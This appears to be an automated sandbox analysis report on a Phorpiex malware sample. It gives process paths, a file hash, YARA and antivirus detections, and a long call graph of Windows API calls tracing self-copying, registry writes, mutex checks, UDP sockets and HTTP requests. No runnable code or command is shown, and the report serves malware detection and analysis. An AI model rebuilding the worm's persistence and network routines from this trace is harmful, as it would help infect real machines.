                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\2676917645.exe
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                                                                                                                MD5 hash:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000000F.00000002.507786324.000000000040F000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000000F.00000000.482216563.000000000040F000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000000F.00000003.507495356.0000000000566000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2676917645.exe, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                Start time:18:55:35
                                                                                                                                                                                                                                                                Start date:12/12/2022
                                                                                                                                                                                                                                                                Path:C:\Users\user\sysfevcs.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Users\user\sysfevcs.exe
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                                                                                                                MD5 hash:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000010.00000002.518234685.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000010.00000000.505235810.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysfevcs.exe, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:1.1%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:16.6%
                                                                                                                                                                                                                                                                  Total number of Nodes:1444
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                  execution_graph 4232 405b40 Sleep 4233 405b68 4232->4233 4234 405b76 PathFileExistsW 4233->4234 4235 405bbc CreateMutexA GetLastError 4233->4235 4234->4233 4236 405b85 DeleteFileW DeleteFileA MoveFileA 4234->4236 4237 405be6 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4235->4237 4238 405bde ExitProcess 4235->4238 4236->4233 4239 405c71 4237->4239 4240 405f5e Sleep RegOpenKeyExA 4239->4240 4287 40ce10 GetLocaleInfoA 4239->4287 4242 406075 RegOpenKeyExA 4240->4242 4243 405f8f 8 API calls 4240->4243 4245 406181 Sleep 4242->4245 4246 40609b 8 API calls 4242->4246 4243->4242 4295 40aee0 4245->4295 4246->4245 4247 405d10 ExpandEnvironmentStringsW wsprintfW CopyFileW 4250 405d64 SetFileAttributesW RegOpenKeyExW 4247->4250 4251 405e3d Sleep wsprintfW CopyFileW 4247->4251 4248 405d08 ExitProcess 4254 405d99 RegSetValueExW RegCloseKey 4250->4254 4255 405e1e 4250->4255 4251->4240 4253 405e85 SetFileAttributesW RegOpenKeyExW 4251->4253 4259 405eba RegSetValueExW RegCloseKey 4253->4259 4260 405f3f 4253->4260 4254->4255 4289 40d0b0 memset CreateProcessW 4255->4289 4256 4062e9 4257 40619c 9 API calls 4298 404320 InitializeCriticalSection CreateFileW 4257->4298 4259->4260 4263 40d0b0 5 API calls 4260->4263 4268 405f4b 4263->4268 4268->4240 4271 405f56 ExitProcess 4268->4271 4269 405e35 ExitProcess 4273 406251 CreateEventA 4330 40a610 4273->4330 4282 40b8c0 17 API calls 4283 4062b1 4282->4283 4284 40b8c0 17 API calls 4283->4284 4285 4062cd 4284->4285 4286 40b8c0 17 API calls 4285->4286 4286->4256 4288 405d00 4287->4288 4288->4247 4288->4248 4290 40d110 Sleep 4289->4290 4291 40d11f ShellExecuteW 4289->4291 4292 405e2a 4290->4292 4293 40d154 4291->4293 4294 40d145 Sleep 4291->4294 4292->4251 4292->4269 4293->4292 4294->4292 4375 40aeb0 4295->4375 4299 404445 4298->4299 4300 404358 CreateFileMappingW 4298->4300 4312 40cd40 CoInitializeEx 4299->4312 4301 404379 MapViewOfFile 4300->4301 4302 40443b CloseHandle 4300->4302 4303 404431 CloseHandle 4301->4303 4304 404398 GetFileSize 4301->4304 4302->4299 4303->4302 4306 4043ad 4304->4306 4305 404427 UnmapViewOfFile 4305->4303 4306->4305 4308 4043ec 4306->4308 4311 4043bc 4306->4311 4504 40af30 4306->4504 4511 404210 4306->4511 4309 408990 _invalid_parameter 3 API calls 4308->4309 4309->4311 4311->4305 4748 40c2a0 socket 4312->4748 4316 40624c 4325 4058d0 CoInitializeEx SysAllocString 4316->4325 4317 40cd60 4317->4316 4318 40cdaa 4317->4318 4324 40cde8 4317->4324 4758 40c950 4317->4758 4773 409260 htons 4318->4773 4323 40ccc0 24 API calls 4323->4324 4792 408ab0 4324->4792 4326 4058f2 4325->4326 4327 405908 CoUninitialize 4325->4327 4937 405640 4326->4937 4327->4273 4946 40a5d0 4330->4946 4333 40a5d0 3 API calls 4334 40a62e 4333->4334 4335 40a5d0 3 API calls 4334->4335 4336 40a63e 4335->4336 4337 40a5d0 3 API calls 4336->4337 4338 406269 4337->4338 4339 40b810 4338->4339 4340 408820 7 API calls 4339->4340 4341 40b81b 4340->4341 4342 406273 4341->4342 4343 40b827 InitializeCriticalSection 4341->4343 4344 409a60 InitializeCriticalSection 4342->4344 4343->4342 4349 409a7a 4344->4349 4345 409aa9 CreateFileW 4347 409ad0 CreateFileMappingW 4345->4347 4348 409b92 4345->4348 4351 409af1 MapViewOfFile 4347->4351 4352 409b88 CloseHandle 4347->4352 4990 409470 EnterCriticalSection 4348->4990 4349->4345 4953 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4349->4953 4954 409750 4349->4954 4355 409b0c GetFileSize 4351->4355 4356 409b7e CloseHandle 4351->4356 4352->4348 4354 409b97 4357 40b8c0 17 API calls 4354->4357 4362 409b2b 4355->4362 4356->4352 4359 40627d 4357->4359 4358 409b74 UnmapViewOfFile 4358->4356 4363 40b8c0 4359->4363 4361 409750 28 API calls 4361->4362 4362->4358 4362->4361 4989 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4362->4989 4364 40b8d7 EnterCriticalSection 4363->4364 4365 406296 4363->4365 5013 40b840 4364->5013 4365->4282 4368 40b99b LeaveCriticalSection 4368->4365 4369 408880 9 API calls 4370 40b919 4369->4370 4370->4368 4371 40b92b CreateThread 4370->4371 4371->4368 4372 40b94e 4371->4372 4373 40b972 GetCurrentProcess GetCurrentProcess DuplicateHandle 4372->4373 4374 40b994 4372->4374 4373->4374 4374->4368 4378 40ae50 4375->4378 4379 40ae6e 4378->4379 4381 40ae83 4378->4381 4384 40ab00 4379->4384 4382 406191 4381->4382 4410 40ac80 4381->4410 4382->4256 4382->4257 4385 40ab29 4384->4385 4386 40abb2 4384->4386 4409 40abaa 4385->4409 4444 408820 4385->4444 4388 408820 7 API calls 4386->4388 4386->4409 4390 40abd8 4388->4390 4392 401000 7 API calls 4390->4392 4390->4409 4394 40ac05 4392->4394 4396 4011e0 10 API calls 4394->4396 4398 40ac1f 4396->4398 4397 40ab7f 4399 401000 7 API calls 4397->4399 4401 401000 7 API calls 4398->4401 4400 40ab90 4399->4400 4402 4011e0 10 API calls 4400->4402 4403 40ac30 4401->4403 4402->4409 4404 4011e0 10 API calls 4403->4404 4405 40ac4a 4404->4405 4406 401000 7 API calls 4405->4406 4407 40ac5b 4406->4407 4408 4011e0 10 API calls 4407->4408 4408->4409 4409->4382 4411 40aca9 4410->4411 4412 40ad5a 4410->4412 4413 408820 7 API calls 4411->4413 4443 40ad52 4411->4443 4415 408820 7 API calls 4412->4415 4412->4443 4414 40acbf 4413->4414 4417 401000 7 API calls 4414->4417 4414->4443 4416 40ad7e 4415->4416 4419 401000 7 API calls 4416->4419 4416->4443 4418 40ace3 4417->4418 4420 408820 7 API calls 4418->4420 4421 40ada2 4419->4421 4422 40acf2 4420->4422 4423 408820 7 API calls 4421->4423 4424 4011e0 10 API calls 4422->4424 4425 40adb1 4423->4425 4426 40ad1b 4424->4426 4427 4011e0 10 API calls 4425->4427 4428 408990 _invalid_parameter 3 API calls 4426->4428 4429 40adda 4427->4429 4431 40ad27 4428->4431 4430 408990 _invalid_parameter 3 API calls 4429->4430 4432 40ade6 4430->4432 4433 401000 7 API calls 4431->4433 4435 401000 7 API calls 4432->4435 4434 40ad38 4433->4434 4436 4011e0 10 API calls 4434->4436 4437 40adf7 4435->4437 4436->4443 4438 4011e0 10 API calls 4437->4438 4439 40ae11 4438->4439 4440 401000 7 API calls 4439->4440 4441 40ae22 4440->4441 4442 4011e0 10 API calls 4441->4442 4442->4443 4443->4382 4455 408780 4444->4455 4447 401000 4476 408840 4447->4476 4452 4011e0 4483 4010c0 4452->4483 4454 4011ff __aligned_recalloc_base 4454->4397 4464 408570 GetCurrentProcessId 4455->4464 4457 40878b 4460 408797 _invalid_parameter 4457->4460 4465 4086e0 4457->4465 4459 40880c 4459->4409 4459->4447 4460->4459 4461 4087b2 HeapAlloc 4460->4461 4461->4459 4462 4087d9 _invalid_parameter 4461->4462 4462->4459 4463 4087f4 memset 4462->4463 4463->4459 4464->4457 4473 408570 GetCurrentProcessId 4465->4473 4467 4086e9 4468 408706 HeapCreate 4467->4468 4474 408650 GetProcessHeaps 4467->4474 4469 408720 HeapSetInformation GetCurrentProcessId 4468->4469 4470 408747 4468->4470 4469->4470 4470->4460 4473->4467 4475 408681 4474->4475 4475->4468 4475->4470 4477 408780 _invalid_parameter 7 API calls 4476->4477 4478 40100b 4477->4478 4479 401400 4478->4479 4480 40140a 4479->4480 4481 408840 _invalid_parameter 7 API calls 4480->4481 4482 401018 4481->4482 4482->4452 4484 40110e 4483->4484 4485 4010d1 4483->4485 4484->4485 4486 408840 _invalid_parameter 7 API calls 4484->4486 4485->4454 4489 401132 _invalid_parameter 4486->4489 4487 401162 memcpy 4488 401186 _invalid_parameter 4487->4488 4491 408990 _invalid_parameter 3 API calls 4488->4491 4489->4487 4493 408990 4489->4493 4491->4485 4500 408570 GetCurrentProcessId 4493->4500 4495 40899b 4496 40115f 4495->4496 4501 408590 4495->4501 4496->4487 4499 4089b7 HeapFree 4499->4496 4500->4495 4502 4085c0 HeapValidate 4501->4502 4503 4085e0 4501->4503 4502->4503 4503->4496 4503->4499 4520 408a00 4504->4520 4507 40af71 4507->4306 4510 408990 _invalid_parameter 3 API calls 4510->4507 4728 408880 4511->4728 4514 404301 4514->4306 4515 408a00 8 API calls 4516 40427b 4515->4516 4738 40a8a0 4516->4738 4524 408a2d 4520->4524 4521 408840 _invalid_parameter 7 API calls 4521->4524 4522 408a44 memcpy 4522->4524 4523 408a42 4523->4507 4525 40a440 4523->4525 4524->4521 4524->4522 4524->4523 4527 40a44c 4525->4527 4529 40a4a8 4527->4529 4530 408990 _invalid_parameter 3 API calls 4527->4530 4532 40a46b 4527->4532 4533 40a990 4527->4533 4547 406300 4527->4547 4531 408990 _invalid_parameter 3 API calls 4529->4531 4530->4527 4531->4532 4532->4507 4532->4510 4535 40a99f _invalid_parameter 4533->4535 4534 40a9a9 4534->4527 4535->4534 4536 408840 _invalid_parameter 7 API calls 4535->4536 4537 40aa38 4536->4537 4537->4534 4538 401000 7 API calls 4537->4538 4539 40aa4d 4538->4539 4540 401000 7 API calls 4539->4540 4542 40aa55 4540->4542 4543 40aaad _invalid_parameter 4542->4543 4550 40a930 4542->4550 4555 401050 4543->4555 4546 401050 3 API calls 4546->4534 4663 4084f0 4547->4663 4551 4011e0 10 API calls 4550->4551 4552 40a944 4551->4552 4561 4013e0 4552->4561 4554 40a95c 4554->4542 4557 401064 _invalid_parameter 4555->4557 4559 4010ae 4555->4559 4556 40108c 4558 408990 _invalid_parameter 3 API calls 4556->4558 4557->4556 4560 408990 _invalid_parameter 3 API calls 4557->4560 4558->4559 4559->4546 4560->4556 4564 4012d0 4561->4564 4563 4013fa 4563->4554 4565 4012e4 4564->4565 4566 4010c0 __aligned_recalloc_base 10 API calls 4565->4566 4567 40132d 4566->4567 4568 4010c0 __aligned_recalloc_base 10 API calls 4567->4568 4569 40133d 4568->4569 4570 4010c0 __aligned_recalloc_base 10 API calls 4569->4570 4571 40134d 4570->4571 4572 4010c0 __aligned_recalloc_base 10 API calls 4571->4572 4573 40135d 4572->4573 4574 401366 4573->4574 4575 40138f 4573->4575 4579 402c20 4574->4579 4596 4029d0 4575->4596 4578 401387 __aligned_recalloc_base 4578->4563 4580 401400 _invalid_parameter 7 API calls 4579->4580 4581 402c37 4580->4581 4582 401400 _invalid_parameter 7 API calls 4581->4582 4583 402c46 4582->4583 4584 401400 _invalid_parameter 7 API calls 4583->4584 4585 402c55 4584->4585 4586 401400 _invalid_parameter 7 API calls 4585->4586 4587 402c64 _invalid_parameter __aligned_recalloc_base 4586->4587 4589 402e0f _invalid_parameter 4587->4589 4599 401430 4587->4599 4590 401430 _invalid_parameter 3 API calls 4589->4590 4591 402e35 _invalid_parameter 4589->4591 4590->4589 4592 401430 _invalid_parameter 3 API calls 4591->4592 4593 402e5b _invalid_parameter 4591->4593 4592->4591 4594 401430 _invalid_parameter 3 API calls 4593->4594 4595 402e81 4593->4595 4594->4593 4595->4578 4603 402e90 4596->4603 4598 4029ec 4598->4578 4600 401446 4599->4600 4601 40143b 4599->4601 4600->4587 4602 408990 _invalid_parameter 3 API calls 4601->4602 4602->4600 4604 402ea6 _invalid_parameter 4603->4604 4605 402edd 4604->4605 4607 402eb8 _invalid_parameter 4604->4607 4608 402f03 4604->4608 4633 402880 4605->4633 4607->4598 4609 402f3d 4608->4609 4610 402f5e 4608->4610 4643 402a00 4609->4643 4612 401400 _invalid_parameter 7 API calls 4610->4612 4613 402f6f 4612->4613 4614 401400 _invalid_parameter 7 API calls 4613->4614 4615 402f7e 4614->4615 4616 401400 _invalid_parameter 7 API calls 4615->4616 4617 402f8d 4616->4617 4618 401400 _invalid_parameter 7 API calls 4617->4618 4619 402f9c 4618->4619 4656 402950 4619->4656 4621 401400 _invalid_parameter 7 API calls 4622 402fca _invalid_parameter 4621->4622 4622->4621 4624 403084 _invalid_parameter __aligned_recalloc_base 4622->4624 4623 401430 _invalid_parameter 3 API calls 4623->4624 4624->4623 4625 4033a3 _invalid_parameter 4624->4625 4626 401430 _invalid_parameter 3 API calls 4625->4626 4627 4033c9 _invalid_parameter 4625->4627 4626->4625 4628 401430 _invalid_parameter 3 API calls 4627->4628 4629 4033ef _invalid_parameter 4627->4629 4628->4627 4630 401430 _invalid_parameter 3 API calls 4629->4630 4631 403415 _invalid_parameter 4629->4631 4630->4629 4631->4607 4632 401430 _invalid_parameter 3 API calls 4631->4632 4632->4631 4634 40288e 4633->4634 4635 401400 _invalid_parameter 7 API calls 4634->4635 4636 4028ab 4635->4636 4637 401400 _invalid_parameter 7 API calls 4636->4637 4638 4028ba _invalid_parameter 4637->4638 4639 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4638->4639 4640 40291a _invalid_parameter 4638->4640 4639->4638 4641 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4640->4641 4642 402940 4640->4642 4641->4640 4642->4607 4644 401400 _invalid_parameter 7 API calls 4643->4644 4645 402a17 4644->4645 4646 401400 _invalid_parameter 7 API calls 4645->4646 4647 402a26 4646->4647 4648 401400 _invalid_parameter 7 API calls 4647->4648 4655 402a35 _invalid_parameter __aligned_recalloc_base 4648->4655 4649 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4649->4655 4650 402bc1 _invalid_parameter 4651 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4650->4651 4652 402be7 _invalid_parameter 4650->4652 4651->4650 4653 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4652->4653 4654 402c0d 4652->4654 4653->4652 4654->4607 4655->4649 4655->4650 4657 401400 _invalid_parameter 7 API calls 4656->4657 4658 40295f _invalid_parameter 4657->4658 4659 402880 _invalid_parameter 9 API calls 4658->4659 4660 402998 _invalid_parameter 4659->4660 4661 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4660->4661 4662 4029c3 4660->4662 4661->4660 4662->4622 4664 408502 4663->4664 4667 408450 4664->4667 4668 408840 _invalid_parameter 7 API calls 4667->4668 4669 408460 4668->4669 4671 40849c 4669->4671 4674 40631f 4669->4674 4676 407990 4669->4676 4683 407f70 4669->4683 4688 408340 4669->4688 4673 408990 _invalid_parameter 3 API calls 4671->4673 4673->4674 4674->4527 4677 4079a3 4676->4677 4682 407999 4676->4682 4678 4079e6 memset 4677->4678 4677->4682 4679 407a07 4678->4679 4678->4682 4680 407a0d memcpy 4679->4680 4679->4682 4696 407760 4680->4696 4682->4669 4684 407f87 4683->4684 4687 407f7d 4683->4687 4685 40807f memcpy 4684->4685 4684->4687 4701 407cb0 4684->4701 4685->4684 4687->4669 4690 408356 4688->4690 4694 40834c 4688->4694 4689 407cb0 57 API calls 4691 4083d7 4689->4691 4690->4689 4690->4694 4692 407760 6 API calls 4691->4692 4691->4694 4693 4083f6 4692->4693 4693->4694 4695 40840b memcpy 4693->4695 4694->4669 4695->4694 4697 4077ae 4696->4697 4698 40776e 4696->4698 4697->4682 4698->4697 4700 4076a0 6 API calls 4698->4700 4700->4698 4702 407ccb 4701->4702 4704 407cc1 4701->4704 4702->4704 4707 407af0 4702->4707 4704->4684 4706 407cb0 57 API calls 4706->4704 4708 407afd 4707->4708 4709 407b07 4707->4709 4708->4704 4708->4706 4709->4708 4710 407b90 4709->4710 4711 407b95 4709->4711 4712 407b78 4709->4712 4718 407450 4710->4718 4715 407760 6 API calls 4711->4715 4714 407760 6 API calls 4712->4714 4714->4710 4715->4710 4717 407c3c memset 4717->4708 4719 407469 4718->4719 4727 40745f 4718->4727 4720 407330 6 API calls 4719->4720 4719->4727 4721 407562 4720->4721 4722 408840 _invalid_parameter 7 API calls 4721->4722 4723 4075b1 4722->4723 4724 4071b0 44 API calls 4723->4724 4723->4727 4725 4075de 4724->4725 4726 408990 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4725->4726 4726->4727 4727->4708 4727->4717 4747 408570 GetCurrentProcessId 4728->4747 4730 40888b 4731 4086e0 _invalid_parameter 5 API calls 4730->4731 4737 408897 _invalid_parameter 4730->4737 4731->4737 4732 408590 _invalid_parameter HeapValidate 4732->4737 4733 408940 HeapAlloc 4733->4737 4734 40890a HeapReAlloc 4734->4737 4735 404237 4735->4514 4735->4515 4736 408990 _invalid_parameter 3 API calls 4736->4737 4737->4732 4737->4733 4737->4734 4737->4735 4737->4736 4741 40a8ab 4738->4741 4739 408840 _invalid_parameter 7 API calls 4739->4741 4740 4042c6 4740->4514 4742 4059c0 4740->4742 4741->4739 4741->4740 4743 408840 _invalid_parameter 7 API calls 4742->4743 4744 4059d0 4743->4744 4745 405a17 4744->4745 4746 4059dc memcpy CreateThread CloseHandle 4744->4746 4745->4514 4746->4745 4747->4730 4749 40c3fe 4748->4749 4750 40c2cd htons inet_addr setsockopt 4748->4750 4749->4317 4751 409260 8 API calls 4750->4751 4752 40c346 bind lstrlenA sendto ioctlsocket 4751->4752 4756 40c39b 4752->4756 4753 40c3c2 4805 409320 shutdown closesocket 4753->4805 4756->4753 4757 408880 9 API calls 4756->4757 4796 40c1b0 4756->4796 4757->4756 4812 40bf80 memset InternetCrackUrlA InternetOpenA 4758->4812 4761 40ca6e 4761->4317 4763 408990 _invalid_parameter 3 API calls 4763->4761 4767 40ca3b 4767->4763 4770 40ca31 SysFreeString 4770->4767 4919 409220 inet_addr 4773->4919 4776 40930d 4781 40ccc0 4776->4781 4777 4092bc connect 4778 4092d0 getsockname 4777->4778 4779 409304 4777->4779 4778->4779 4922 409320 shutdown closesocket 4779->4922 4923 409200 inet_ntoa 4781->4923 4783 40ccd6 4784 40b100 11 API calls 4783->4784 4785 40ccf5 4784->4785 4791 40cd38 4785->4791 4924 40ca80 memset InternetCrackUrlA InternetOpenA 4785->4924 4788 40cd2c 4790 408990 _invalid_parameter 3 API calls 4788->4790 4789 408990 _invalid_parameter 3 API calls 4789->4788 4790->4791 4791->4323 4793 408ab4 4792->4793 4794 408aba 4793->4794 4795 408990 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4793->4795 4794->4316 4795->4793 4804 40c1cc 4796->4804 4797 40c294 4797->4756 4798 40c1e8 recvfrom 4799 40c216 StrCmpNIA 4798->4799 4800 40c209 Sleep 4798->4800 4801 40c235 StrStrIA 4799->4801 4799->4804 4800->4804 4802 40c256 StrChrA 4801->4802 4801->4804 4806 40afb0 4802->4806 4804->4797 4804->4798 4805->4749 4808 40afbb 4806->4808 4807 40afc1 lstrlenA 4807->4808 4809 40afd4 4807->4809 4808->4807 4808->4809 4810 408840 _invalid_parameter 7 API calls 4808->4810 4811 40aff0 memcpy 4808->4811 4809->4804 4810->4808 4811->4808 4811->4809 4813 40c021 InternetConnectA 4812->4813 4814 40c197 4812->4814 4815 40c18a InternetCloseHandle 4813->4815 4816 40c05a HttpOpenRequestA 4813->4816 4814->4761 4825 40bd20 4814->4825 4815->4814 4817 40c090 HttpSendRequestA 4816->4817 4818 40c17d InternetCloseHandle 4816->4818 4819 40c170 InternetCloseHandle 4817->4819 4821 40c0ad 4817->4821 4818->4815 4819->4818 4820 40c0ce InternetReadFile 4820->4821 4822 40c0fb 4820->4822 4821->4820 4821->4822 4823 408880 9 API calls 4821->4823 4822->4819 4824 40c116 memcpy 4823->4824 4824->4821 4854 403ce0 4825->4854 4828 40be20 4828->4767 4835 40c900 4828->4835 4829 40bd4a SysAllocString 4830 40bd61 CoCreateInstance 4829->4830 4831 40be17 4829->4831 4833 40be0d SysFreeString 4830->4833 4834 40bd86 4830->4834 4832 408990 _invalid_parameter 3 API calls 4831->4832 4832->4828 4833->4831 4834->4833 4871 40be30 4835->4871 4838 40c7e0 4876 40c600 4838->4876 4843 40c760 6 API calls 4844 40c837 4843->4844 4850 40c889 4844->4850 4893 40c580 4844->4893 4847 40c86f 4847->4850 4898 40bf20 4847->4898 4848 40c580 6 API calls 4848->4847 4850->4770 4851 40b100 4850->4851 4914 40b070 4851->4914 4859 403ced 4854->4859 4855 403cf3 lstrlenA 4855->4859 4860 403d06 4855->4860 4857 408840 _invalid_parameter 7 API calls 4857->4859 4859->4855 4859->4857 4859->4860 4861 408990 _invalid_parameter 3 API calls 4859->4861 4862 403bc0 4859->4862 4866 403c90 4859->4866 4860->4828 4860->4829 4861->4859 4863 403bd7 MultiByteToWideChar 4862->4863 4864 403bca lstrlenA 4862->4864 4865 403bfc 4863->4865 4864->4863 4865->4859 4869 403c9b 4866->4869 4867 403ca1 lstrlenA 4867->4869 4868 403bc0 2 API calls 4868->4869 4869->4867 4869->4868 4870 403cd7 4869->4870 4870->4859 4874 40be56 4871->4874 4872 40bed3 lstrcmpiW 4872->4874 4875 40beeb SysFreeString 4872->4875 4873 40befb 4873->4767 4873->4838 4874->4872 4874->4873 4874->4875 4875->4874 4878 40c626 4876->4878 4877 40c73d 4877->4850 4888 40c760 4877->4888 4878->4877 4879 40c6b3 lstrcmpiW 4878->4879 4880 40c733 SysFreeString 4879->4880 4881 40c6c6 4879->4881 4880->4877 4882 40bf20 2 API calls 4881->4882 4884 40c6d4 4882->4884 4883 40c725 4883->4880 4884->4880 4884->4883 4885 40c703 lstrcmpiW 4884->4885 4886 40c715 4885->4886 4887 40c71b SysFreeString 4885->4887 4886->4887 4887->4883 4889 40bf20 2 API calls 4888->4889 4890 40c77b 4889->4890 4891 40c600 6 API calls 4890->4891 4892 40c7b7 4890->4892 4891->4892 4892->4843 4892->4850 4894 40bf20 2 API calls 4893->4894 4896 40c59b 4894->4896 4895 40c5d7 4895->4847 4895->4848 4896->4895 4902 40c420 4896->4902 4899 40bf46 4898->4899 4900 40be30 2 API calls 4899->4900 4901 40bf5d 4899->4901 4900->4901 4901->4850 4904 40c446 4902->4904 4903 40c55d 4903->4895 4904->4903 4905 40c4d3 lstrcmpiW 4904->4905 4906 40c553 SysFreeString 4905->4906 4907 40c4e6 4905->4907 4906->4903 4908 40bf20 2 API calls 4907->4908 4909 40c4f4 4908->4909 4909->4906 4910 40c545 4909->4910 4911 40c523 lstrcmpiW 4909->4911 4910->4906 4912 40c535 4911->4912 4913 40c53b SysFreeString 4911->4913 4912->4913 4913->4910 4915 40b07d 4914->4915 4916 408880 9 API calls 4915->4916 4917 40b098 SysFreeString 4915->4917 4918 40b020 _vscprintf wvsprintfA 4915->4918 4916->4915 4917->4770 4918->4915 4920 40924c socket 4919->4920 4921 409239 gethostbyname 4919->4921 4920->4776 4920->4777 4921->4920 4922->4776 4923->4783 4925 40ccb1 4924->4925 4926 40cb24 InternetConnectA 4924->4926 4925->4788 4925->4789 4927 40cca4 InternetCloseHandle 4926->4927 4928 40cb5d HttpOpenRequestA 4926->4928 4927->4925 4929 40cb93 HttpAddRequestHeadersA HttpSendRequestA 4928->4929 4930 40cc97 InternetCloseHandle 4928->4930 4931 40cc8a InternetCloseHandle 4929->4931 4934 40cbdd 4929->4934 4930->4927 4931->4930 4932 40cbf4 InternetReadFile 4933 40cc21 4932->4933 4932->4934 4933->4931 4934->4932 4934->4933 4935 408880 9 API calls 4934->4935 4936 40cc3c memcpy 4935->4936 4936->4934 4943 405677 4937->4943 4938 4055f0 CoCreateInstance 4938->4943 4939 40584b 4940 405854 SysFreeString 4939->4940 4942 40585e SysFreeString 4939->4942 4940->4942 4941 408990 _invalid_parameter 3 API calls 4941->4939 4942->4327 4943->4938 4944 4057c6 SysAllocString 4943->4944 4945 405692 4943->4945 4944->4943 4944->4945 4945->4939 4945->4941 4947 40a5da 4946->4947 4948 40a5de 4946->4948 4947->4333 4950 40a590 CryptAcquireContextW 4948->4950 4951 40a5cb 4950->4951 4952 40a5ad CryptGenRandom CryptReleaseContext 4950->4952 4951->4947 4952->4951 4953->4349 4993 409490 gethostname 4954->4993 4957 409769 4957->4349 4959 40977c strstr 4960 40978c 4959->4960 4961 4097cd 4959->4961 4997 409200 inet_ntoa 4960->4997 4999 409200 inet_ntoa 4961->4999 4964 40979a strstr 4964->4957 4966 4097aa 4964->4966 4965 4097db strstr 4967 4097eb 4965->4967 4968 40982c EnterCriticalSection 4965->4968 4998 409200 inet_ntoa 4966->4998 5000 409200 inet_ntoa 4967->5000 4969 409844 4968->4969 4979 40986f 4969->4979 5002 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4969->5002 4972 4097b8 strstr 4972->4957 4972->4961 4973 4097f9 strstr 4973->4957 4974 409809 4973->4974 5001 409200 inet_ntoa 4974->5001 4977 409817 strstr 4977->4957 4977->4968 4978 409968 LeaveCriticalSection 4978->4957 4979->4978 4980 408820 7 API calls 4979->4980 4981 4098b3 4980->4981 4981->4978 5003 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4981->5003 4983 4098d1 4984 4098f3 Sleep 4983->4984 4985 4098fd 4983->4985 4987 409923 4983->4987 4984->4983 4986 408990 _invalid_parameter 3 API calls 4985->4986 4986->4987 4987->4978 5004 409380 4987->5004 4989->4362 4991 409380 14 API calls 4990->4991 4992 409483 LeaveCriticalSection 4991->4992 4992->4354 4994 4094b7 gethostbyname 4993->4994 4995 4094d3 4993->4995 4994->4995 4995->4957 4996 409200 inet_ntoa 4995->4996 4996->4959 4997->4964 4998->4972 4999->4965 5000->4973 5001->4977 5002->4979 5003->4983 5005 409394 5004->5005 5012 40938f 5004->5012 5006 408840 _invalid_parameter 7 API calls 5005->5006 5008 4093a8 5006->5008 5007 409404 CreateFileW 5009 409453 InterlockedExchange 5007->5009 5010 409427 WriteFile FlushFileBuffers CloseHandle 5007->5010 5008->5007 5008->5012 5011 408990 _invalid_parameter 3 API calls 5009->5011 5010->5009 5011->5012 5012->4978 5014 40b84d 5013->5014 5015 40b8b1 5014->5015 5016 40b871 WaitForSingleObject 5014->5016 5015->4368 5015->4369 5016->5014 5017 40b88c 